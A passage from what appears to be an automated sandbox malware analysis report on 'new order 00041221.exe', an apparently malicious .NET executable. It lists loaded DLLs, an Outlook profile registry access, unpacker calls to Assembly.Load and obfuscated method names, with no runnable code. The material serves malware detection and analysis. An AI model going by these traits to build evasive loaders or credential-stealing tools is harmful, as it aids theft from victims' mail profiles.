                    Source: C:\Users\user\Desktop\new order 00041221.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\new order 00041221.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\new order 00041221.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\Desktop\new order 00041221.exeSection loaded: dwrite.dllJump to behavior
                    Source: C:\Users\user\Desktop\new order 00041221.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\Desktop\new order 00041221.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\Desktop\new order 00041221.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\new order 00041221.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\Desktop\new order 00041221.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\Desktop\new order 00041221.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\Desktop\new order 00041221.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\new order 00041221.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\Desktop\new order 00041221.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Users\user\Desktop\new order 00041221.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\new order 00041221.exeSection loaded: windowscodecs.dllJump to behavior
                    Source: C:\Users\user\Desktop\new order 00041221.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Users\user\Desktop\new order 00041221.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\Desktop\new order 00041221.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\Desktop\new order 00041221.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\new order 00041221.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\new order 00041221.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\new order 00041221.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\Desktop\new order 00041221.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\Desktop\new order 00041221.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\Desktop\new order 00041221.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\new order 00041221.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\Desktop\new order 00041221.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\Desktop\new order 00041221.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\Desktop\new order 00041221.exeSection loaded: rasapi32.dllJump to behavior
                    Source: C:\Users\user\Desktop\new order 00041221.exeSection loaded: rasman.dllJump to behavior
                    Source: C:\Users\user\Desktop\new order 00041221.exeSection loaded: rtutils.dllJump to behavior
                    Source: C:\Users\user\Desktop\new order 00041221.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Users\user\Desktop\new order 00041221.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Users\user\Desktop\new order 00041221.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Users\user\Desktop\new order 00041221.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\new order 00041221.exeSection loaded: dhcpcsvc6.dllJump to behavior
                    Source: C:\Users\user\Desktop\new order 00041221.exeSection loaded: dhcpcsvc.dllJump to behavior
                    Source: C:\Users\user\Desktop\new order 00041221.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\new order 00041221.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\new order 00041221.exeSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Users\user\Desktop\new order 00041221.exeSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Users\user\Desktop\new order 00041221.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Users\user\Desktop\new order 00041221.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\Desktop\new order 00041221.exeSection loaded: schannel.dllJump to behavior
                    Source: C:\Users\user\Desktop\new order 00041221.exeSection loaded: mskeyprotect.dllJump to behavior
                    Source: C:\Users\user\Desktop\new order 00041221.exeSection loaded: ntasn1.dllJump to behavior
                    Source: C:\Users\user\Desktop\new order 00041221.exeSection loaded: ncrypt.dllJump to behavior
                    Source: C:\Users\user\Desktop\new order 00041221.exeSection loaded: ncryptsslp.dllJump to behavior
                    Source: C:\Users\user\Desktop\new order 00041221.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Users\user\Desktop\new order 00041221.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\new order 00041221.exeSection loaded: dpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\new order 00041221.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                    Source: C:\Users\user\Desktop\new order 00041221.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                    Source: C:\Users\user\Desktop\new order 00041221.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                    Source: new order 00041221.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                    Source: new order 00041221.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

                    Data Obfuscation

                    barindex
                    .NET source code contains potential unpacker
                    Source: 1.2.new order 00041221.exe.4e00000.5.raw.unpack, -.cs.Net Code: _0001 System.Reflection.Assembly.Load(byte[])
                    Source: 1.2.new order 00041221.exe.4e00000.5.raw.unpack, PingPong.cs.Net Code: Justy
                    Source: 1.2.new order 00041221.exe.3bd3aa0.4.raw.unpack, roTOmjLT5gBK2EC4ca.cs.Net Code: zn4PwiPIJE System.Reflection.Assembly.Load(byte[])
                    Source: 1.2.new order 00041221.exe.3c588c0.1.raw.unpack, roTOmjLT5gBK2EC4ca.cs.Net Code: zn4PwiPIJE System.Reflection.Assembly.Load(byte[])
                    Source: C:\Users\user\Desktop\new order 00041221.exeCode function: 1_2_00B50995 push es; retf 1_2_00B50996
                    Source: C:\Users\user\Desktop\new order 00041221.exeCode function: 1_2_00B50990 push es; retf 1_2_00B50992
                    Source: C:\Users\user\Desktop\new order 00041221.exeCode function: 1_2_00B50998 push es; retf 1_2_00B5099A
                    Source: new order 00041221.exeStatic PE information: section name: .text entropy: 7.869956261157549
                    Source: 1.2.new order 00041221.exe.3bd3aa0.4.raw.unpack, WEkErVgJn1PjkdRbDK.csHigh entropy of concatenated method names: 'ksnI2GS1Sg', 'VnxIHA1l58', 't0a4VAcCPY', 'oQ84QADq3w', 'eI3I7WmpKy', 'EJuIi4Zvbw', 'fmqIJplq0r', 'h5TIThviGG', 'UvbIp8eT3v', 'EsqIKrXUbo'
                    Source: 1.2.new order 00041221.exe.3bd3aa0.4.raw.unpack, WWoXcRNneectu4WPwU.csHigh entropy of concatenated method names: 'RKxXTaU8XU', 'O4fXpM9MLJ', 'JZQXK2uKPD', 'mq2XA3gDqd', 'kmHXM5uq7j', 'pN6XgcqyJ0', 'XptXBdQ7MW', 'Tf1X21wsy0', 'CygX3yV0An', 'aH8XHyXNT5'
                    Source: 1.2.new order 00041221.exe.3bd3aa0.4.raw.unpack, roTOmjLT5gBK2EC4ca.csHigh entropy of concatenated method names: 'TnNcydYa2J', 'dDScniRR6g', 'uifcX6rF3s', 'nvTc17deCr', 'go7cFXNGOO', 'aeFcqE6AOX', 'p1GcdwLXIJ', 'q2WcLOinJS', 'M45cvlLUBX', 'vmHc6aeHeH'
                    Source: 1.2.new order 00041221.exe.3bd3aa0.4.raw.unpack, oea08sDOxeGOQEPJMl.csHigh entropy of concatenated method names: 'cZi1UD1duR', 'Ts41mieuZQ', 'wtU1NFkZUI', 'iH71D659No', 'VnX19UvdC9', 'F9g1btumD8', 'Q6S1Ig8Mgq', 'H9t14PxF4A', 'cAt18gNNot', 'p6B1ZflOJY'
                    Source: 1.2.new order 00041221.exe.3bd3aa0.4.raw.unpack, XmPheVJY4ysEIwXRAO.csHigh entropy of concatenated method names: 'CgOYNhHAP8', 'uRcYDFv0kY', 'L3KYCgYnO6', 'JhPYaQEUk1', 'LSDYhTMLv0', 'rnxYtRxO1p', 'Qy7YuRNx2J', 'dHDYl1xcid', 'vO6YG442JZ', 'tDbY7BPaeV'
                    Source: 1.2.new order 00041221.exe.3bd3aa0.4.raw.unpack, mbWDZh1fAEZLVbsgfE.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'jw8E31Gaa6', 'nnVEHVEl9N', 'ndFEzAoAJN', 'paKcVOD7yC', 'j4acQh4pQv', 'tkRcEw5qPq', 'Nk6cc7I2M9', 'pyCWuszn5xgZTgfnr4'
                    Source: 1.2.new order 00041221.exe.3bd3aa0.4.raw.unpack, I7YwgKocvwlhG6qbjf.csHigh entropy of concatenated method names: 'wdWdOkt4Ps', 'BamdjKUSML', 'eVCdwilZeg', 'mSHdUjUfqC', 'iCSdxYoDsc', 'aehdmNBA7r', 'am5dR4ucNm', 'F5tdNOlLFZ', 'W1LdDeFOWc', 'G3idWcUSLB'
                    Source: 1.2.new order 00041221.exe.3bd3aa0.4.raw.unpack, PIIQJlCPLLSpQvTcKh.csHigh entropy of concatenated method names: 'b4GqyFWMdu', 'AfAqX6BqTP', 'ONFqFuTCFb', 'cCHqdTZVgh', 'eMVqLEAHQ3', 'iSpFMvLFvV', 'R9RFgeiQ7D', 'D7NFBRGC3o', 'vO1F2beHyp', 'CcWF3y8wEN'
                    Source: 1.2.new order 00041221.exe.3bd3aa0.4.raw.unpack, GYgZrNuv1RLjrByTBp.csHigh entropy of concatenated method names: 'iuwdnHRsSL', 'QSMd1F3EnS', 'KJddqi2bQf', 'lwKqHsatdr', 'XY8qzqC01e', 'lu0dV442ey', 'of0dQ67e9b', 'GnEdEGwfuG', 'gk2dcRFu0Z', 'pKvdPIspOA'
                    Source: 1.2.new order 00041221.exe.3bd3aa0.4.raw.unpack, hoHp1pQctWiW4gDnx50.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'tsAZTNw5uf', 'uYcZpVy21l', 'n6aZKsjMAm', 'GDwZAyOhkQ', 'WoaZMv3tJE', 'gutZgOrcEU', 'BvsZBefRFc'
                    Source: 1.2.new order 00041221.exe.3bd3aa0.4.raw.unpack, EOaFyVT7LVLL2nf3aa.csHigh entropy of concatenated method names: 'QKq9GO9fTr', 'gyD9i53UBx', 'p2P9TW5cah', 'gms9pywHhM', 'dLy9am6YKj', 'Wnr9sI7qFF', 'x8A9hHXUN5', 't6m9tsNGWd', 'QGQ9eMPTLG', 'rti9upkk4l'
                    Source: 1.2.new order 00041221.exe.3bd3aa0.4.raw.unpack, AqI0NT2diOTHy7sR0b.csHigh entropy of concatenated method names: 'tuV4nyOFRM', 'y6F4Xp7hNv', 'bmD41et1gl', 'UIY4FicyPl', 'TGo4q7HxGK', 'bQs4dAEteO', 'Yf14LiYr7Z', 'Dxn4vQZICO', 'dLt46E79RC', 'JoG4r6bHYo'
                    Source: 1.2.new order 00041221.exe.3bd3aa0.4.raw.unpack, GXXJusPBLvRYKwa80t.csHigh entropy of concatenated method names: 'R32QdWoXcR', 'feeQLctu4W', 'HOxQ6eGOQE', 'eJMQrlq8D6', 'WsSQ90ZiII', 'bJlQbPLLSp', 'NnsoucCHxhjAwZMhmt', 'YGMTVDOjmS5iXELVeW', 'dmmQQah407', 'SgrQc2WkMG'
                    Source: 1.2.new order 00041221.exe.3bd3aa0.4.raw.unpack, UNqWbw3JDl6LusN8wK.csHigh entropy of concatenated method names: 'Kjx4CvxSgn', 'ypk4aUWCm1', 'mlS4suMWec', 'dNl4h5XYDT', 'avw4T5rcsq', 'MqE4t5ZWy0', 'Next', 'Next', 'Next', 'NextBytes'
                    Source: 1.2.new order 00041221.exe.3bd3aa0.4.raw.unpack, DsmWQqH9ImqBkLuxMX.csHigh entropy of concatenated method names: 's9l8QCne5F', 'tjm8cvEgBE', 'DKB8PFkg0y', 'nwv8nxfSyE', 'LY88Xj82vM', 'zPt8FCqvDF', 'FIp8qBvDyt', 'bcB4BXeTTW', 'NR4421EPwJ', 'PLL434vFq2'
                    Source: 1.2.new order 00041221.exe.3bd3aa0.4.raw.unpack, bdkeCrEVO5b4aL692H.csHigh entropy of concatenated method names: 'I8EwZfp6c', 'pUJU8T80o', 'AadmniBuO', 't2cR03kQc', 'oTVDWbFOM', 'ItkWLWrx1', 'X6e2a2abtuTE5Bm115', 'bcVhaRQTvD5v2RDGdp', 'U314W1CEr', 'oCHZooEr4'
                    Source: 1.2.new order 00041221.exe.3bd3aa0.4.raw.unpack, P6MW4SQV1ZS9x9j2kD1.csHigh entropy of concatenated method names: 'XQK8OFv8Gd', 'vXR8jmwba6', 'SIS8wCjfnD', 'aVL8UZhaRv', 'Epq8x4uoDE', 'P0U8meJxAG', 'y288RW4Hr9', 'Ard8NsxcSb', 'HLs8DQc3WI', 'bdq8WFJSKe'
                    Source: 1.2.new order 00041221.exe.3bd3aa0.4.raw.unpack, GO6JcJXsuV8AKf3A4i.csHigh entropy of concatenated method names: 'Dispose', 'bcRQ3ZkbIi', 'OMxEaZsbQ7', 'cNqUUWQuGV', 'nUqQHI0NTd', 'POTQzHy7sR', 'ProcessDialogKey', 'wbMEVNqWbw', 'QDlEQ6LusN', 'rwKEENsmWQ'
                    Source: 1.2.new order 00041221.exe.3bd3aa0.4.raw.unpack, i8D6JcW7rn00w2sS0Z.csHigh entropy of concatenated method names: 'Qd6Fx6BdST', 'cFgFR2Zn1M', 'BLd1s1n3JR', 'qKK1hqcd29', 'gh31tEIYRV', 'aug1eNL3oL', 'Sle1u2sA8l', 'TwD1lvAuXd', 'DYh1oHpr3v', 'lEU1GAIYf2'
                    Source: 1.2.new order 00041221.exe.3c588c0.1.raw.unpack, WEkErVgJn1PjkdRbDK.csHigh entropy of concatenated method names: 'ksnI2GS1Sg', 'VnxIHA1l58', 't0a4VAcCPY', 'oQ84QADq3w', 'eI3I7WmpKy', 'EJuIi4Zvbw', 'fmqIJplq0r', 'h5TIThviGG', 'UvbIp8eT3v', 'EsqIKrXUbo'
                    Source: 1.2.new order 00041221.exe.3c588c0.1.raw.unpack, WWoXcRNneectu4WPwU.csHigh entropy of concatenated method names: 'RKxXTaU8XU', 'O4fXpM9MLJ', 'JZQXK2uKPD', 'mq2XA3gDqd', 'kmHXM5uq7j', 'pN6XgcqyJ0', 'XptXBdQ7MW', 'Tf1X21wsy0', 'CygX3yV0An', 'aH8XHyXNT5'
                    Source: 1.2.new order 00041221.exe.3c588c0.1.raw.unpack, roTOmjLT5gBK2EC4ca.csHigh entropy of concatenated method names: 'TnNcydYa2J', 'dDScniRR6g', 'uifcX6rF3s', 'nvTc17deCr', 'go7cFXNGOO', 'aeFcqE6AOX', 'p1GcdwLXIJ', 'q2WcLOinJS', 'M45cvlLUBX', 'vmHc6aeHeH'
                    Source: 1.2.new order 00041221.exe.3c588c0.1.raw.unpack, oea08sDOxeGOQEPJMl.csHigh entropy of concatenated method names: 'cZi1UD1duR', 'Ts41mieuZQ', 'wtU1NFkZUI', 'iH71D659No', 'VnX19UvdC9', 'F9g1btumD8', 'Q6S1Ig8Mgq', 'H9t14PxF4A', 'cAt18gNNot', 'p6B1ZflOJY'
                    Source: 1.2.new order 00041221.exe.3c588c0.1.raw.unpack, XmPheVJY4ysEIwXRAO.csHigh entropy of concatenated method names: 'CgOYNhHAP8', 'uRcYDFv0kY', 'L3KYCgYnO6', 'JhPYaQEUk1', 'LSDYhTMLv0', 'rnxYtRxO1p', 'Qy7YuRNx2J', 'dHDYl1xcid', 'vO6YG442JZ', 'tDbY7BPaeV'
                    Source: 1.2.new order 00041221.exe.3c588c0.1.raw.unpack, mbWDZh1fAEZLVbsgfE.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'jw8E31Gaa6', 'nnVEHVEl9N', 'ndFEzAoAJN', 'paKcVOD7yC', 'j4acQh4pQv', 'tkRcEw5qPq', 'Nk6cc7I2M9', 'pyCWuszn5xgZTgfnr4'
                    Source: 1.2.new order 00041221.exe.3c588c0.1.raw.unpack, I7YwgKocvwlhG6qbjf.csHigh entropy of concatenated method names: 'wdWdOkt4Ps', 'BamdjKUSML', 'eVCdwilZeg', 'mSHdUjUfqC', 'iCSdxYoDsc', 'aehdmNBA7r', 'am5dR4ucNm', 'F5tdNOlLFZ', 'W1LdDeFOWc', 'G3idWcUSLB'
                    Source: 1.2.new order 00041221.exe.3c588c0.1.raw.unpack, PIIQJlCPLLSpQvTcKh.csHigh entropy of concatenated method names: 'b4GqyFWMdu', 'AfAqX6BqTP', 'ONFqFuTCFb', 'cCHqdTZVgh', 'eMVqLEAHQ3', 'iSpFMvLFvV', 'R9RFgeiQ7D', 'D7NFBRGC3o', 'vO1F2beHyp', 'CcWF3y8wEN'
                    Source: 1.2.new order 00041221.exe.3c588c0.1.raw.unpack, GYgZrNuv1RLjrByTBp.csHigh entropy of concatenated method names: 'iuwdnHRsSL', 'QSMd1F3EnS', 'KJddqi2bQf', 'lwKqHsatdr', 'XY8qzqC01e', 'lu0dV442ey', 'of0dQ67e9b', 'GnEdEGwfuG', 'gk2dcRFu0Z', 'pKvdPIspOA'
                    Source: 1.2.new order 00041221.exe.3c588c0.1.raw.unpack, hoHp1pQctWiW4gDnx50.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'tsAZTNw5uf', 'uYcZpVy21l', 'n6aZKsjMAm', 'GDwZAyOhkQ', 'WoaZMv3tJE', 'gutZgOrcEU', 'BvsZBefRFc'
                    Source: 1.2.new order 00041221.exe.3c588c0.1.raw.unpack, EOaFyVT7LVLL2nf3aa.csHigh entropy of concatenated method names: 'QKq9GO9fTr', 'gyD9i53UBx', 'p2P9TW5cah', 'gms9pywHhM', 'dLy9am6YKj', 'Wnr9sI7qFF', 'x8A9hHXUN5', 't6m9tsNGWd', 'QGQ9eMPTLG', 'rti9upkk4l'
                    Source: 1.2.new order 00041221.exe.3c588c0.1.raw.unpack, AqI0NT2diOTHy7sR0b.csHigh entropy of concatenated method names: 'tuV4nyOFRM', 'y6F4Xp7hNv', 'bmD41et1gl', 'UIY4FicyPl', 'TGo4q7HxGK', 'bQs4dAEteO', 'Yf14LiYr7Z', 'Dxn4vQZICO', 'dLt46E79RC', 'JoG4r6bHYo'
                    Source: 1.2.new order 00041221.exe.3c588c0.1.raw.unpack, GXXJusPBLvRYKwa80t.csHigh entropy of concatenated method names: 'R32QdWoXcR', 'feeQLctu4W', 'HOxQ6eGOQE', 'eJMQrlq8D6', 'WsSQ90ZiII', 'bJlQbPLLSp', 'NnsoucCHxhjAwZMhmt', 'YGMTVDOjmS5iXELVeW', 'dmmQQah407', 'SgrQc2WkMG'
                    Source: 1.2.new order 00041221.exe.3c588c0.1.raw.unpack, UNqWbw3JDl6LusN8wK.csHigh entropy of concatenated method names: 'Kjx4CvxSgn', 'ypk4aUWCm1', 'mlS4suMWec', 'dNl4h5XYDT', 'avw4T5rcsq', 'MqE4t5ZWy0', 'Next', 'Next', 'Next', 'NextBytes'
                    Source: 1.2.new order 00041221.exe.3c588c0.1.raw.unpack, DsmWQqH9ImqBkLuxMX.csHigh entropy of concatenated method names: 's9l8QCne5F', 'tjm8cvEgBE', 'DKB8PFkg0y', 'nwv8nxfSyE', 'LY88Xj82vM', 'zPt8FCqvDF', 'FIp8qBvDyt', 'bcB4BXeTTW', 'NR4421EPwJ', 'PLL434vFq2'
                    Source: 1.2.new order 00041221.exe.3c588c0.1.raw.unpack, bdkeCrEVO5b4aL692H.csHigh entropy of concatenated method names: 'I8EwZfp6c', 'pUJU8T80o', 'AadmniBuO', 't2cR03kQc', 'oTVDWbFOM', 'ItkWLWrx1', 'X6e2a2abtuTE5Bm115', 'bcVhaRQTvD5v2RDGdp', 'U314W1CEr', 'oCHZooEr4'
                    Source: 1.2.new order 00041221.exe.3c588c0.1.raw.unpack, P6MW4SQV1ZS9x9j2kD1.csHigh entropy of concatenated method names: 'XQK8OFv8Gd', 'vXR8jmwba6', 'SIS8wCjfnD', 'aVL8UZhaRv', 'Epq8x4uoDE', 'P0U8meJxAG', 'y288RW4Hr9', 'Ard8NsxcSb', 'HLs8DQc3WI', 'bdq8WFJSKe'
                    Source: 1.2.new order 00041221.exe.3c588c0.1.raw.unpack, GO6JcJXsuV8AKf3A4i.csHigh entropy of concatenated method names: 'Dispose', 'bcRQ3ZkbIi', 'OMxEaZsbQ7', 'cNqUUWQuGV', 'nUqQHI0NTd', 'POTQzHy7sR', 'ProcessDialogKey', 'wbMEVNqWbw', 'QDlEQ6LusN', 'rwKEENsmWQ'
                    Source: 1.2.new order 00041221.exe.3c588c0.1.raw.unpack, i8D6JcW7rn00w2sS0Z.csHigh entropy of concatenated method names: 'Qd6Fx6BdST', 'cFgFR2Zn1M', 'BLd1s1n3JR', 'qKK1hqcd29', 'gh31tEIYRV', 'aug1eNL3oL', 'Sle1u2sA8l', 'TwD1lvAuXd', 'DYh1oHpr3v', 'lEU1GAIYf2'
                    Source: C:\Users\user\Desktop\new order 00041221.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
                    Source: C:\Users\user\Desktop\new order 00041221.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\new order 00041221.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\new order 00041221.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\new order 00041221.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\new order 00041221.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\new order 00041221.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\new order 00041221.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\new order 00041221.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\new order 00041221.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\new order 00041221.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\new order 00041221.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\new order 00041221.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\new order 00041221.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\new order 00041221.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\new order 00041221.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\new order 00041221.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\new order 00041221.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\new order 00041221.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\new order 00041221.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\new order 00041221.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\new order 00041221.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\new order 00041221.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\new order 00041221.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\new order 00041221.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\new order 00041221.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\new order 00041221.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\new order 00041221.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\new order 00041221.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\new order 00041221.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\new order 00041221.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\new order 00041221.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\new order 00041221.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\new order 00041221.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\new order 00041221.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\new order 00041221.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\new order 00041221.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\new order 00041221.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\new order 00041221.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\new order 00041221.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\new order 00041221.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\new order 00041221.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\new order 00041221.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\new order 00041221.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\new order 00041221.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\new order 00041221.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\new order 00041221.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\new order 00041221.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\new order 00041221.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\new order 00041221.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\new order 00041221.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\new order 00041221.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\new order 00041221.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\new order 00041221.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\new order 00041221.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\new order 00041221.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\new order 00041221.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\new order 00041221.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\new order 00041221.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\new order 00041221.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\new order 00041221.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\new order 00041221.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\new order 00041221.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\new order 00041221.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\new order 00041221.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\new order 00041221.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\new order 00041221.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\new order 00041221.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\new order 00041221.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\new order 00041221.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\new order 00041221.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\new order 00041221.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\new order 00041221.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\new order 00041221.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\new order 00041221.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
